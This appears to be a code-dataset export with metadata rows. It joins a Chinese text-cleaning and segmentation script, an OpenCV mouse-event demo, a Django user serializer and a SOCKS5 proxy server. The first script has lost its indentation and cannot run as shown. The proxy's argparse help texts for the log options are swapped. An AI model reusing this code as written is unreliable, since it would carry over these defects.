raw_file = 'data/raw/text.txt'
clean_file = 'data/processed/clean_text.txt'
seg_file = 'data/processed/seg_text.txt'
logger = logging.getLogger('Preprocess')
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.INFO)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
def clean_func(line):
line_punct_replaced = re.sub(r"[%s]+" % punctuation, " ", line)
line_string_punct_replaced = re.sub(r"[%s]+" % string.punctuation, " ", line_punct_replaced)
line_removed_character = re.sub(r"[a-zA-Z]+", " ", line_string_punct_replaced)
return line_removed_character
def data_clean():
multiprocessing.set_start_method('spawn')
pool = multiprocessing.Pool(processes=multiprocessing.cpu_count())
logger.info('Loading raw text')
with open(raw_file, 'r', encoding='utf8') as fin:
raw_lines = fin.readlines()
fin.close()
logger.info('Cleaning raw text')
results = []
lines = tqdm(raw_lines, desc=u'已清理0行文本')
for i, line in enumerate(lines):
results.append(pool.apply(clean_func, (line,)))
if i % 10000 == 0:
lines.set_description(u'已清理%s行文本' % i)
pool.close()
pool.join()
logger.info('Writing clean text')
with open(clean_file, 'w', encoding='utf8') as fout:
line_min_len = 5
for line in results:
if len(line.strip()) < line_min_len:
continue
fout.writelines(line)
fout.close()
logger.info('Text clean ended')
def seq_func(line):
# print("seq:", line)
return " ".join(jieba.cut(line, cut_all=False))
def data_seg():
logger.info('Segmenting cleaned text')
pool = multiprocessing.Pool(processes=multiprocessing.cpu_count())
logger.info('Loading clean text')
with open(clean_file, 'r', encoding='utf8') as fin:
clean_lines = fin.readlines()
fin.close()
logger.info('Segmenting clean text')
results = []
lines = tqdm(clean_lines, desc=u'已完成0行文本分词')
for i, line in enumerate(lines):
results.append(pool.apply(seq_func, (line,)))
if i % 10000 == 0:
lines.set_description(u'已完成%s行文本分词' % i)
pool.close()
pool.join()
logger.info('Writing segment text')
with open(seg_file, 'w', encoding='utf8') as fout:
for line in results:
fout.writelines(line)
fout.close()
logger.info('Text segement ended')
if __name__ == "__main__":
data_clean()
data_seg()
| 28.216495
| 96
| 0.663866
|
4a18c96bd17726ce97a25359e6008553082163ac
| 760
|
py
|
Python
|
Day07/mouse.py
|
dksmuz7/open-cv
|
eff81e97aa9830ae0342a98f942b0b082e4d7f2a
|
[
"MIT"
] | null | null | null |
Day07/mouse.py
|
dksmuz7/open-cv
|
eff81e97aa9830ae0342a98f942b0b082e4d7f2a
|
[
"MIT"
] | null | null | null |
Day07/mouse.py
|
dksmuz7/open-cv
|
eff81e97aa9830ae0342a98f942b0b082e4d7f2a
|
[
"MIT"
] | null | null | null |
# Mouse event bindings
# importing library
import cv2 as cv
import numpy as np
def draw(event,x,y,flags,param):
print("Flags =",flags) # unique for button clicked
print("Param =",param) # process is going on
# binding double left click to draw circle
if event == cv.EVENT_LBUTTONDBLCLK:
cv.circle(img,(x,y),75,(0,255,255),5)
# binding middle button down to draw rectangle
if event == cv.EVENT_MBUTTONDOWN:
cv.rectangle(img,(x,y),(x+100,y+50),(0,255,255),5)
cv.namedWindow(winname = "Result")
# creating black image
img = np.zeros((600,800,3),np.uint8)
cv.setMouseCallback("Result",draw)
while True:
cv.imshow("Result",img)
if cv.waitKey(1) & 0xFF == 27: # 27= ESC key
break
cv.destroyAllWindows()
| 25.333333
| 58
| 0.665789
|
4a18ca12cf0ed4f966f593ce63ac50d4b21bd280
| 459
|
py
|
Python
|
backend/medicar/agendamento/serializers/usuario.py
|
devlarysson/medicar
|
da47f03e6718c2053d42360806aae3ebb3b6f727
|
[
"MIT"
] | 1
|
2020-06-26T22:08:42.000Z
|
2020-06-26T22:08:42.000Z
|
backend/medicar/agendamento/serializers/usuario.py
|
devlarysson/medicar
|
da47f03e6718c2053d42360806aae3ebb3b6f727
|
[
"MIT"
] | null | null | null |
backend/medicar/agendamento/serializers/usuario.py
|
devlarysson/medicar
|
da47f03e6718c2053d42360806aae3ebb3b6f727
|
[
"MIT"
] | 1
|
2020-08-04T21:42:45.000Z
|
2020-08-04T21:42:45.000Z
|
from django.contrib.auth.models import User
from rest_framework import serializers
class UsuarioSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ['username', 'email', 'password', 'first_name']
def create(self, validated_data):
password = validated_data.pop('password')
user = User.objects.create(**validated_data)
user.set_password(password)
user.save()
return user
| 28.6875
| 64
| 0.679739
|
4a18cacffd1dc7f3674441885d1409e734e84911
| 10,169
|
py
|
Python
|
socks5_server.py
|
raddup/socks5-server-py
|
44f7d3f491ff33087d2c9ceacd1b3269ad2aad14
|
[
"MIT"
] | null | null | null |
socks5_server.py
|
raddup/socks5-server-py
|
44f7d3f491ff33087d2c9ceacd1b3269ad2aad14
|
[
"MIT"
] | null | null | null |
socks5_server.py
|
raddup/socks5-server-py
|
44f7d3f491ff33087d2c9ceacd1b3269ad2aad14
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
""" socks5_server
Supports both python 2 and 3.
"""
__author__ = "Caleb Madrigal"
__date__ = '2016-10-17'
import sys
import argparse
import logging
import socket
import select
import threading
PY3 = sys.version_info[0] == 3
if PY3:
chr_to_int = lambda x: x
encode_str = lambda x: x.encode()
else:
chr_to_int = ord
encode_str = lambda x: x
SOCK_TIMEOUT = 5 # seconds
RESEND_TIMEOUT = 60 # seconds
MAX_RECEIVE_SIZE = 65536
VER = b'\x05'
METHOD = b'\x00'
SUCCESS = b'\x00'
SOCK_FAIL = b'\x01'
NETWORK_FAIL = b'\x02'
HOST_FAIL = b'\x04'
REFUSED = b'\x05'
TTL_EXPIRED = b'\x06'
UNSUPPORTED_CMD = b'\x07'
ADDR_TYPE_UNSUPPORT = b'\x08'
UNASSIGNED = b'\x09'
ADDR_TYPE_IPV4 = b'\x01'
ADDR_TYPE_DOMAIN = b'\x03'
ADDR_TYPE_IPV6 = b'\x04'
CMD_TYPE_CONNECT = b'\x01'
CMD_TYPE_TCP_BIND = b'\x02'
CMD_TYPE_UDP = b'\x03'
def make_logger(log_path=None, log_level_str='INFO'):
formatter = logging.Formatter('%(asctime)s: %(name)s (%(levelname)s): %(message)s')
if log_path:
log_handler = logging.FileHandler(log_path)
else:
log_handler = logging.StreamHandler(sys.stdout)
log_handler.setFormatter(formatter)
logger = logging.getLogger('socks5_server')
logger.addHandler(log_handler)
log_level = logging.getLevelName(log_level_str.upper())
logger.setLevel(log_level)
return logger
class Socks5Server:
def __init__(self, host, port, logger, backlog=128):
self.host = host
self.port = port
self.logger = logger
self.backlog = backlog
self.client_dest_map_lock = threading.Lock()
# This holds client_sock -> dest_sock and dest_sock -> client_sock mappings
self.client_dest_map = {}
# Maps from sock -> buffer to send to sock
self.sock_send_buffers = {}
def buffer_receive(self, sock):
""" Reads into the buffer for the corresponding relay socket. """
target_sock = self.client_dest_map[sock]
buf = sock.recv(MAX_RECEIVE_SIZE)
if len(buf) == 0:
self.flush_and_close_sock_pair(sock)
elif target_sock not in self.sock_send_buffers:
self.sock_send_buffers[target_sock] = buf
else:
self.sock_send_buffers[target_sock] = self.sock_send_buffers[target_sock] + buf
def buffer_send(self, sock):
if sock in self.sock_send_buffers:
bytes_sent = sock.send(self.sock_send_buffers[sock])
self.sock_send_buffers[sock] = self.sock_send_buffers[sock][bytes_sent:]
def flush_and_close_sock_pair(self, sock, error_msg=None):
""" Flush any remaining send buffers to the correct socket, close the sockets, and remove
the pair of sockets from both the client_dest_map and the sock_send_buffers dicts. """
if error_msg:
self.logger.error('flushing and closing pair due to error: %s' % error_msg)
else:
self.logger.info('Flushing and closing finished connection pair')
with self.client_dest_map_lock:
partner_sock = self.client_dest_map.pop(sock)
self.client_dest_map.pop(partner_sock)
try:
partner_sock.send(self.sock_send_buffers.pop(partner_sock, b''))
partner_sock.close()
sock.send(self.sock_send_buffers.pop(sock, b''))
sock.close()
except Exception:
pass
def establish_socks5(self, sock):
""" Speak the SOCKS5 protocol to get and return dest_host, dest_port. """
dest_host, dest_port = None, None
try:
ver, nmethods, methods = sock.recv(1), sock.recv(1), sock.recv(1)
sock.sendall(VER + METHOD)
ver, cmd, rsv, address_type = sock.recv(1), sock.recv(1), sock.recv(1), sock.recv(1)
dst_addr = None
dst_port = None
if address_type == ADDR_TYPE_IPV4:
dst_addr, dst_port = sock.recv(4), sock.recv(2)
dst_addr = '.'.join([str(chr_to_int(i)) for i in dst_addr])
elif address_type == ADDR_TYPE_DOMAIN:
addr_len = ord(sock.recv(1))
dst_addr, dst_port = sock.recv(addr_len), sock.recv(2)
dst_addr = ''.join([chr(chr_to_int(i)) for i in dst_addr])
elif address_type == ADDR_TYPE_IPV6:
dst_addr, dst_port = sock.recv(16), sock.recv(2)
tmp_addr = []
for i in range(len(dst_addr) // 2):
tmp_addr.append(chr(dst_addr[2 * i] * 256 + dst_addr[2 * i + 1]))
dst_addr = ':'.join(tmp_addr)
dst_port = chr_to_int(dst_port[0]) * 256 + chr_to_int(dst_port[1])
server_sock = sock
server_ip = ''.join([chr(int(i)) for i in socket.gethostbyname(self.host).split('.')])
if cmd == CMD_TYPE_TCP_BIND:
self.logger.error('TCP Bind requested, but is not supported by socks5_server')
sock.close()
elif cmd == CMD_TYPE_UDP:
self.logger.error('UDP requested, but is not supported by socks5_server')
sock.close()
elif cmd == CMD_TYPE_CONNECT:
sock.sendall(VER + SUCCESS + b'\x00' + b'\x01' + encode_str(server_ip +
chr(self.port // 256) + chr(self.port % 256)))
dest_host, dest_port = dst_addr, dst_port
else:
# Unsupport/unknown Command
self.logger.error('Unsupported/unknown SOCKS5 command requested')
sock.sendall(VER + UNSUPPORTED_CMD + encode_str(server_ip + chr(self.port // 256) +
chr(self.port % 256)))
sock.close()
except KeyboardInterrupt as e:
self.logger.error('Error in SOCKS5 establishment: %s' % e)
return dest_host, dest_port
def handle_connect_thread(self, client_sock, addr):
""" Handles the establishment of the connection from the client, the socks5 protocol,
and to the destination. Once finished, it puts the client and dest sockets into the
self.client_dest_map, from where they are serviced by the main loop/thread. """
self.logger.info('Connection from: %s:%d' % addr)
client_sock.settimeout(SOCK_TIMEOUT)
dest_host, dest_port = self.establish_socks5(client_sock)
if None in (dest_host, dest_port):
client_sock.close()
return None
self.logger.debug('Trying to connect to destination: %s:%d' % (dest_host, dest_port))
dest_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dest_sock.settimeout(RESEND_TIMEOUT)
try:
dest_sock.connect((dest_host, dest_port))
except Exception as e:
self.logger.error('Failed to connect to requested destination (%s:%d) due to error: %s'
% (dest_host, dest_port, e))
client_sock.close()
return None
self.logger.debug('Connection to %s:%d established' % (dest_host, dest_port))
# From this point on, we'll be doing nonblocking io on the sockets
client_sock.settimeout(RESEND_TIMEOUT)
client_sock.setblocking(0)
dest_sock.setblocking(0)
with self.client_dest_map_lock:
self.client_dest_map[client_sock] = dest_sock
self.client_dest_map[dest_sock] = client_sock
self.logger.info('SOCKS5 proxy from %s:%d to %s:%d established' %
(addr[0], addr[1], dest_host, dest_port))
def accept_connection(self):
(client, addr) = self.server_sock.accept()
t = threading.Thread(target=self.handle_connect_thread, args=(client, addr))
t.daemon = True
t.start()
def serve_forever(self):
self.server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_sock.bind((self.host, self.port))
self.server_sock.listen(self.backlog)
self.logger.info('Serving on %s:%d' % (self.host, self.port))
while True:
connected_sockets = list(self.client_dest_map.keys())
in_socks = [self.server_sock] + connected_sockets
out_socks = connected_sockets
in_ready, out_ready, err_ready = select.select(in_socks, out_socks, [], 0.1)
for sock in in_ready:
if sock == self.server_sock:
self.accept_connection()
else:
try:
self.buffer_receive(sock)
except Exception as e:
self.flush_and_close_sock_pair(sock, str(e))
for sock in out_ready:
try:
self.buffer_send(sock)
except Exception:
pass
for sock in err_ready:
if sock == self.server_sock:
self.logger.critical('Error in server socket; closing down')
for c in connected_sockets:
c.close()
self.server_sock.close()
sys.exit(1)
else:
self.flush_and_close_sock_pair(sock, 'Unknown socket error')
def main(args):
logger = make_logger(log_path=args.log_path, log_level_str=args.log_level)
socks5_server = Socks5Server(args.host, args.port, logger)
socks5_server.serve_forever()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--host', action='store', default='',
help='IP/Hostname to serve on', type=str)
parser.add_argument('-p', '--port', action='store', default=1080,
help='Port to serve on', type=int)
parser.add_argument('--log-path', action='store', default=None,
help='DEBUG, INFO, WARNING, ERROR, or CRITICAL', type=str)
parser.add_argument('--log-level', action='store', default='INFO',
help='Log file path', type=str)
args = parser.parse_args()
main(args)
| 39.568093
| 99
| 0.601239
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.